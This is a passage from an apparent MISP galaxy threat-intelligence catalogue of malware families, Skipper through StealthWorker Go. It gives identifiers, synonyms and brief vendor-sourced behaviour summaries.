UUID fac6313b-8068-429c-93ae-21e8072cf667 which can be used as unique global reference for Skipper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Skyplex

Internal MISP references

UUID 39002a0d-99aa-4568-b110-48f6df1759cd which can be used as unique global reference for Skyplex in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex - webarchive

Associated metadata

Metadata key	Value
type	[]

Slam

Ransomware.

Internal MISP references

UUID 400e437d-13b3-44d9-8f75-34f5e82d6c88 which can be used as unique global reference for Slam in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Slave

Internal MISP references

UUID 1f4d8d42-8f31-47f8-b2b7-2d43196de532 which can be used as unique global reference for Slave in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SLICKSHOES

Internal MISP references

UUID a82f80fc-71e8-4dee-8a64-e5cbb4100321 which can be used as unique global reference for SLICKSHOES in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Slingshot

2012 first sighted
Attack vector via compromised Mikrotik routers where victims get infection when they connect to Mikrotik router admin software - Winbox
2018 when discovered by Kaspersky Team

Infection Vector - Infected Mikrotik Router > Malicious DLL (IP4.dll) in Router > User connect via winbox > Malicious DLL downloaded on computer

Internal MISP references

UUID d6178858-1244-41cf-aeed-8c6afc1d6846 which can be used as unique global reference for Slingshot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sliver

According to VK9 Seecurity, Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.

Internal MISP references

UUID 654c478e-3c9a-4fd9-a9b7-dd6839f51147 which can be used as unique global reference for Sliver in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

slnrat

Internal MISP references

UUID 68bb36d3-d078-483d-b559-e0d8da5f45fe which can be used as unique global reference for slnrat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SlothfulMedia

According to MITRE, SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017. It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SlothfulMedia.

Known Synonyms
`QueenOfClubs`

Internal MISP references

UUID f23d70bc-7de6-49bd-bb69-82518b4d7fca which can be used as unique global reference for SlothfulMedia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SLUB

Internal MISP references

UUID 1bc01fca-9a1e-4669-bd9d-8dd29416f9c1 which can be used as unique global reference for SLUB in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

smac

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular smac.

Known Synonyms
`speccom`

Internal MISP references

UUID a8561caf-eb9f-4a02-8277-a898a0a259ae which can be used as unique global reference for smac in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Smackdown

Internal MISP references

UUID 427dcec9-e2b9-44ad-bf58-281b7ba971bb which can be used as unique global reference for Smackdown in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SManager

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SManager.

Known Synonyms
`PhantomNet`

Internal MISP references

UUID 1a6a6e4c-3e0e-422b-9840-9c6286dc7b17 which can be used as unique global reference for SManager in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SmartEyes

Internal MISP references

UUID 67723f6e-822b-475a-938b-c9114b9aefea which can be used as unique global reference for SmartEyes in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SmartLoader

Internal MISP references

UUID af011dc6-e8a3-4a06-9fb8-42045cea92c5 which can be used as unique global reference for SmartLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SMAUG

According to PCrisk, Smaug ransomware is available for download on the dark web: it is for sale as Ransomware as a Service (RaaS). Therefore, cyber criminals who purchase it can perform ransomware attacks without having to develop malware of this type. Smaug is designed to encrypt files, rename them and create a ransom message.

Internal MISP references

UUID b81cbf03-8909-4833-badf-4df32c9bf6cb which can be used as unique global reference for SMAUG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SMOKEDHAM

According to Mandiant, SMOKEDHAM is dropped through a powershell script that contains the (C#) source code for this backdoor, which is stored in an encrypted variable. The dropper dynamically defines a cmdlet and .NET class for the backdoor, meaning the compiled code is only found in memory.

Internal MISP references

UUID 7547af7d-e4fe-4ee1-8a3d-55981740b78c which can be used as unique global reference for SMOKEDHAM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SmokeLoader

The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SmokeLoader.

Known Synonyms
`Dofoil`
`Sharik`
`Smoke`
`Smoke Loader`

Internal MISP references

UUID ba91d713-c36e-4d98-9fb7-e16496a69eec which can be used as unique global reference for SmokeLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Smominru

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Smominru.

Known Synonyms
`Ismo`

Internal MISP references

UUID 26b91007-a8ae-4e32-bd99-292e44735c3d which can be used as unique global reference for Smominru in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Smrss32

Ransomware.

Internal MISP references

UUID 1fe0b2fe-5f9b-4359-b362-be611537442a which can be used as unique global reference for Smrss32 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sn0wsLogger

Internal MISP references

UUID 17c6c227-5c9b-40eb-886b-19e2b137c5e8 which can be used as unique global reference for Sn0wsLogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Snake

Snake Ransomware is a Golang ransomware reportedly containing obfuscation not typically seen in Golang ransomware. This malware will remove shadow copies and kill processes related to SCADA/ICS devices, virtual machines, remote management tools, network management software, and others. After this, encryption of files on the device commences, while skipping Windows system folders and various system files. A random 5 character string is appended to encrypted files. According to Bleeping Computer, this ransomware takes an especially long time to encrypt files on a targeted machine. This ransomware is reported to target an entire network, rather than individual workstations.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Snake.

Known Synonyms
`EKANS`
`SNAKEHOSE`

Internal MISP references

UUID 547deef9-67c3-483e-933d-171ee8b6b918 which can be used as unique global reference for Snake in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Snatch

Snatch is a ransomware which infects victims by rebooting the PC into Safe Mode. Most of the existing security protections do not run in Safe Mode so that it the malware can act without expected countermeasures and it can encrypt as many files as it finds. It uses common packers such as UPX to hide its payload.

Internal MISP references

UUID 98139439-6863-439c-b4d0-c6893f1afb23 which can be used as unique global reference for Snatch in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SnatchCrypto

Malware observed in the SnatchCrypto campaign, attributed by Kaspersky Labs to BlueNoroff with high confidence.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SnatchCrypto.

Known Synonyms
`BackbitingTea`

Internal MISP references

UUID b7affd90-6551-4266-b864-a0b9f6d5b309 which can be used as unique global reference for SnatchCrypto in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SnatchLoader

A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.

Internal MISP references

UUID 467c726e-6e19-4d15-88b6-362cbe0b3d20 which can be used as unique global reference for SnatchLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SNEEPY

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SNEEPY.

Known Synonyms
`ByeByeShell`

Internal MISP references

UUID 212d1ed7-0519-412b-a1ce-56046ca93372 which can be used as unique global reference for SNEEPY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Snifula

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Snifula.

Known Synonyms
`Ursnif`

Internal MISP references

UUID 4f3ad937-bf2f-40cb-9695-a2bedfd41bfa which can be used as unique global reference for Snifula in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Snojan

Internal MISP references

UUID 0646a6eb-1c13-4d87-878e-9431314597bf which can be used as unique global reference for Snojan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SnowFlake Stealer

Information stealer, written in Rust.

Internal MISP references

UUID 7ddfdf14-ec97-48ea-88a6-055147583dc3 which can be used as unique global reference for SnowFlake Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Internal MISP references

UUID 99a10948-d7ba-4ad0-b73c-c7762143a193 which can be used as unique global reference for SNS Locker in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker - webarchive

Associated metadata

Metadata key	Value
type	[]

Sobaken

According to ESET, this RAT was derived from (the open-source) Quasar RAT.

Internal MISP references

UUID 81e4fc8f-7b05-42bf-8ff9-568362d4f964 which can be used as unique global reference for Sobaken in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sobig

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sobig.

Known Synonyms
`Palyh`

Internal MISP references

UUID 4e9f85e7-0575-40e5-8799-288ec28237ca which can be used as unique global reference for Sobig in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Socelars

Socelars is an infostealer with main focus on: * Facebook Stealer (ads/manager) * Cookie Stealer | AdsCreditCard {Amazon}

Internal MISP references

UUID 4366ea63-b784-428c-bb00-89ee99eaf8c3 which can be used as unique global reference for Socelars in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sockbot

Sockbot is a customized and in Go written fork of the Ligolo reverse tunneling open-source tool. Several modification were performed by the threat actors who rewrote that code, e.g. execution checks, hardcoded values. Ligolo: https://github.com/sysdream/ligolo

Internal MISP references

UUID b477dcfb-281c-4bef-9a23-f004ebe5a465 which can be used as unique global reference for Sockbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Socks5 Systemz

The Socks5 Systemz malware is a proxy botnet distributed via the PrivateLoader and Amadey loaders. Active since at least 2016, this botnet infects devices to use them as proxies for malicious activities, offering access for prices ranging from $1 to $140 per day in cryptocurrency. It employs a domain generation algorithm (DGA) to evade detection and enhance its resilience. Persistence is maintained through a Windows service named ContentDWSvc, with the malware injected into memory via a file called previewer.exe. To date, it has compromised approximately 10,000 devices globally, excluding Russia.

Internal MISP references

UUID 38734f44-ebc4-4250-a20e-5dac0fb5c0ed which can be used as unique global reference for Socks5 Systemz in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SocksBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SocksBot.

Known Synonyms
`BIRDDOG`
`Nadrac`

Internal MISP references

UUID da34bf80-6dc6-4b07-8094-8bed2c1176ec which can be used as unique global reference for SocksBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SodaMaster

This is a RAT that is usually loaded with one or more shellcode and/or reflective DLL injection techniques. The RAT uses RC4 or a hardcoded RSA key for traffic encryption/decryption. Its communication can either happen via a raw TCP socket or a HTTP POST request. Depending on the version, the RAT may remotely execute DLLs or shellcode.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SodaMaster.

Known Synonyms
`DelfsCake`
`HEAVYPOT`
`dfls`

Internal MISP references

UUID 016ea180-ec16-48ce-88ea-c78d8db369d5 which can be used as unique global reference for SodaMaster in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Solar

Internal MISP references

UUID 1a11c0a9-8ab8-4e98-a7e6-e575eba33c93 which can be used as unique global reference for Solar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Solarbot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Solarbot.

Known Synonyms
`Napolar`

Internal MISP references

UUID d61a1656-9413-46de-bd19-c7fe5eda3371 which can be used as unique global reference for Solarbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

solarmarker

Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.

Some of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.

The malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular solarmarker.

Known Synonyms
`Jupyter`
`Polazert`
`Yellow Cockatoo`

Internal MISP references

UUID 4e08d816-9fe3-42ae-b7e4-f7182445f304 which can be used as unique global reference for solarmarker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SolidBit

Ransomware, written in .NET.

Internal MISP references

UUID 94b4f63b-48c9-4f43-b145-c967f173d87d which can be used as unique global reference for SolidBit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SombRAT

Internal MISP references

UUID 2b2cffc5-bf6e-4636-a906-829c32115655 which can be used as unique global reference for SombRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Somnia

Internal MISP references

UUID 907ed2ce-5407-4e4d-9b1a-596d5489b008 which can be used as unique global reference for Somnia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sorano

Internal MISP references

UUID 897985dc-6b3e-4d92-bbe4-c4902194cdcc which can be used as unique global reference for Sorano in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

soraya

Internal MISP references

UUID 26aa3c43-5049-4a2e-bec1-9709b31a1a26 which can be used as unique global reference for soraya in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SoreFang

Internal MISP references

UUID 0068e2fe-0d13-4073-be73-90118b1d285a which can be used as unique global reference for SoreFang in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sorgu

Internal MISP references

UUID bc135ba5-637b-46c9-94fc-2eef5e018bb5 which can be used as unique global reference for Sorgu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Soul

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Soul.

Known Synonyms
`SoulSearcher`

Internal MISP references

UUID f7e3b124-ad70-4456-9aff-3ec501e8c42d which can be used as unique global reference for Soul in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SOUNDBITE

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SOUNDBITE.

Known Synonyms
`denis`

Internal MISP references

UUID f4cac204-3d3f-4bb6-84bd-fc27b2f5158c which can be used as unique global reference for SOUNDBITE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpaceColon

According to ESET, Spacecolon is a collection of malware written in Delphi, consisting of ScRansom, ScHackTool, ScInstaller, ScService, and ScPatcher.

Internal MISP references

UUID be9addb2-2caf-476c-8d50-c9803d997af6 which can be used as unique global reference for SpaceColon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SPACESHIP

SPACESHIP searches for files with a specified set of file extensions and copies them to a removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive, which could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is then used to steal documents from the air-gapped system, copying them to a removable drive inserted into the SPACESHIP-infected system

Internal MISP references

UUID 813e2761-6d68-493f-846b-2fc86d2e8079 which can be used as unique global reference for SPACESHIP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Spark

Internal MISP references

UUID 3c676c22-8041-4cf6-8291-1bb9372e2d45 which can be used as unique global reference for Spark in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sparkle

Internal MISP references

UUID 339c60f6-8758-4d32-aa33-b0d722e924bb which can be used as unique global reference for Sparkle in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sparksrv

Internal MISP references

UUID 1937c3e0-569d-4eb4-b769-ae5d9cc27755 which can be used as unique global reference for Sparksrv in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SparkRAT

Internal MISP references

UUID 55c6dce3-650b-4f67-8b47-5f6cd0acb72c which can be used as unique global reference for SparkRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SparrowDoor

Internal MISP references

UUID 412a1b1b-77b1-4149-b7bd-14a43aa40dda which can be used as unique global reference for SparrowDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Spartacus

Spartacus is ransomware written in .NET and emerged in the first half of 2018.

Internal MISP references

UUID e4dce19f-bb8e-4ea1-b771-58b162946f29 which can be used as unique global reference for Spartacus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Spereal

Internal MISP references

UUID d386150b-4be2-4541-ae70-5a6cf227f119 which can be used as unique global reference for Spereal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SPECTRALVIPER

Internal MISP references

UUID 4f9ee4dc-725e-4a8e-8c10-a013f6949b2d which can be used as unique global reference for SPECTRALVIPER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Spectre Rat

Mixed RAT and Botnet malware sold in underground forums. In march 2021 it was advertised with the Spectre 2.0, it reached version 3 in June 2021 and then quickly version 4. This crimeware tool was being abused in malicious campaigns targeting European users in September 2021.

Internal MISP references

UUID 0d0935cc-d98f-4a0e-8e13-f36358e974b4 which can be used as unique global reference for Spectre Rat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Spedear

Internal MISP references

UUID bd29030e-d440-4842-bc2a-c173ed938da4 which can be used as unique global reference for Spedear in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SPHijacker

According to Trend Micro, this is a tool designed to disable security products, adopting two approaches to achieve this purpose. One approach terminates the security product process by using a vulnerable driver, zamguard64.sys, published by Zemana (vulnerability designated as CVE-2018-5713). Meanwhile, another approach disables process launching by using a new technique that they named stack rumbling.

Internal MISP references

UUID 24541e4c-27b3-4a80-9dca-972f9825d36b which can be used as unique global reference for SPHijacker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SPICA

Internal MISP references

UUID e974faa2-107b-4a63-b10f-7b5936bf263f which can be used as unique global reference for SPICA in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Spicy Hot Pot

Internal MISP references

UUID dfbe088e-dd6d-4bad-8e2b-7a4162034da4 which can be used as unique global reference for Spicy Hot Pot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SPIDERPIG RAT

Internal MISP references

UUID 70d271b7-2dcc-4b4f-94a5-9ea4b2165510 which can be used as unique global reference for SPIDERPIG RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

splitloader

Internal MISP references

UUID dda86498-6a45-47c5-b9e4-0816c31765f5 which can be used as unique global reference for splitloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Spora

Internal MISP references

UUID 7eeafa7c-0282-4667-bb1a-5ebc3a845d6d which can be used as unique global reference for Spora in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpyBot

Internal MISP references

UUID 34e9d701-22a1-4315-891d-443edd077abf which can be used as unique global reference for SpyBot in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot - webarchive

Associated metadata

Metadata key	Value
type	[]

Spyder

Internal MISP references

UUID bcee00e4-5316-45ad-8811-33c50b9394f8 which can be used as unique global reference for Spyder in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Spyder Patchwork

Internal MISP references

UUID d16712eb-7f4c-4810-aadd-18db9036ec17 which can be used as unique global reference for Spyder Patchwork in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpyEye

SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originated in Russia, it was available in dark forums for $500+ claiming to be the "The Next Zeus Malware". It performed many functionalities typical from bankers trojan such as keyloggers, auto-fill credit card modules, email backups, config files (encrypted), http access, Pop3 grabbers and FTP grabbers. SpyEye allowed hackers to steal money from online bank accounts and initiate transactions even while valid users are logged into their bank account.

Internal MISP references

UUID 814fa0b7-0468-4ed0-b910-2b3caec96d44 which can be used as unique global reference for SpyEye in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SquidLoader

Internal MISP references

UUID e9a3bc19-e7e7-4cce-8dd1-8b59e87b9522 which can be used as unique global reference for SquidLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Squirrelwaffle

According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim’s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a visual basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try and trick the user into enabling macros in Office documents.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Squirrelwaffle.

Known Synonyms
`DatopLoader`

Internal MISP references

UUID cdbfd973-fa96-4e64-b2a3-9d51460fd7af which can be used as unique global reference for Squirrelwaffle in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SquirtDanger

According to PaloAlto, SquirtDanger is a commodity botnet malware family that comes equipped with a number of characteristics and capabilities. The malware is written in C# (C Sharp) and has multiple layers of embedded code. Once run on the system, it will persist via a scheduled task that is set to run every minute. SquirtDanger uses raw TCP connections to a remote command and control (C2) server for network communications.

Internal MISP references

UUID 858a2cdb-9c89-436a-b8d4-60c725c7ac63 which can be used as unique global reference for SquirtDanger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

sRDI

sRDI allows for the conversion of DLL files to position independent shellcode. It attempts to be a fully functional PE loader supporting proper section permissions, TLS callbacks, and sanity checks. It can be thought of as a shellcode PE loader strapped to a packed DLL.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular sRDI.

Known Synonyms
`DAVESHELL`

Internal MISP references

UUID 90ee25aa-89a8-4d70-a4d8-aee44561a146 which can be used as unique global reference for sRDI in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SSHNET

Internal MISP references

UUID 7e0667e8-67fd-4b5f-a3e4-3ced4dcaac1e which can be used as unique global reference for SSHNET in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SslMM

Internal MISP references

UUID 009db412-762d-4256-8df9-eb213be01ffd which can be used as unique global reference for SslMM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SSLoad

SSLoad is a Rust-based downloader that first emerged in January 2024 and is used to deliver secondary payloads. Early versions of the malware used a first-stage DLL that connected to a Telegram channel named 'SSLoad' to retrieve another URL. It then downloaded a compressed PE file using a hardcoded User-Agent (SSLoad/1.x) and Content-Type over HTTP. The downloaded file was then decompressed and executed directly in memory. The malware has since undergone several updates, including changes to the command-and-control (C2) communication and the supporting executables that load the malware. Recent versions of the malware bypass the first-stage DLL by loading SSLoad directly onto the victim's machine.

Internal MISP references

UUID 4eaafa4a-34a5-42f5-8f77-debb51b1e460 which can be used as unique global reference for SSLoad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stabuniq

Internal MISP references

UUID faa2196f-df4c-454c-995e-ded7864d5fa8 which can be used as unique global reference for Stabuniq in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StalinLocker

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular StalinLocker.

Known Synonyms
`StalinScreamer`

Internal MISP references

UUID 8c38460b-fcfd-434e-b258-875854c6aff6 which can be used as unique global reference for StalinLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stampedo

Internal MISP references

UUID b1efbadf-26e5-4e35-8fd2-61642c30ecbf which can be used as unique global reference for Stampedo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StarCruft

Internal MISP references

UUID acd8fc63-c22a-4c11-907e-33e358fdd293 which can be used as unique global reference for StarCruft in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StarLoader

Internal MISP references

UUID f1decba9-6b3b-4636-a2b6-2208e178591a which can be used as unique global reference for StarLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StarsyPound

Internal MISP references

UUID 6df9bbd4-ab32-4d09-afdb-97eed274520a which can be used as unique global reference for StarsyPound in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StartPage

Potentially unwanted program that changes the startpage of browsers to induce ad impressions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular StartPage.

Known Synonyms
`Easy Television Access Now`

Internal MISP references

UUID 033dbef5-eb51-4f7b-87e6-6dc4bef72841 which can be used as unique global reference for StartPage in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

STASHLOG

Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.

Internal MISP references

UUID 4a844c8c-996c-4562-bed4-0496d7838157 which can be used as unique global reference for STASHLOG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StealBit

This is a stealer used by LockBit 2.0.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular StealBit.

Known Synonyms
`Corrempa`

Internal MISP references

UUID b98c86d4-1eee-490e-a6f9-e9559322fec8 which can be used as unique global reference for StealBit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stealc

Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.

Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.

Internal MISP references

UUID 58a2c661-470e-438d-bea3-bff1ed987ed2 which can be used as unique global reference for Stealc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stealerium

According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor’s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.

Internal MISP references

UUID bf71f246-7382-486d-996d-c2b7aa8cf89b which can be used as unique global reference for Stealerium in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stealer0x3401

According to PTSecurity, this stealer harvests system information which is then RC4 encrypted and Base64 encoded before sending it to the C2 server.

Internal MISP references

UUID b30b8058-45d9-45aa-8a1f-c6abc78edef8 which can be used as unique global reference for Stealer0x3401 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

STEALHOOK

Internal MISP references

UUID 8bc60b62-05f0-44bc-8edc-cbdcafe242d0 which can be used as unique global reference for STEALHOOK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

StealthWorker Go

